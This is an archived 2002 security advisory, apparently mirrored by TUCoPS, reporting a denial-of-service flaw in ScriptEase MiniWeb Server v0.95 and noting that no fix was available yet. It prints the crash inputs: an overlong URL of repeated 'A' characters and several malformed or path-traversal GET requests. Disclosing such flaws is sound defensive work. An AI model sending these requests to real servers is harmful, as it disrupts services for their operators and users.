20th Feb 2002 [SBWID-5116]
COMMAND
ScriptEase MiniWeb Server DoS
SYSTEMS AFFECTED
ScriptEase MiniWeb Server v0.95 (And may be other)
PROBLEM
Tamer Sahin [http://www.securityoffice.net] reported following on the
ScriptEase MiniWeb Server, written entirely in ScriptEase, which is
being distributed free by Nombas. This server is not intended to
compete with commercial web servers, rather it is meant to allow you to
easily setup a personal web site and for testing page design and CGI
scripts (http://www.nombas.com).
ScriptEase MiniWeb Server is subject to a denial of service. Submitting
a request of unusual length to the host will cause the server to crash.
A restart is required in order to gain normal functionality.
http://host/AAAAAA...(Ax2000)...AAAAAA
Tested:
Windows 2000 / ScriptEase MiniWeb Server v0.95
Update (25 February 2002)
======
\'ken\'@FTU added, the following DoS lines :
GET /%2e%2e/ HTTP/1.0
GET /../../../../../../../../../ HTTP/1.0
GET HTTP/1.0
GET ../../../../../../../../../../ HTTP/1.0
SOLUTION
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
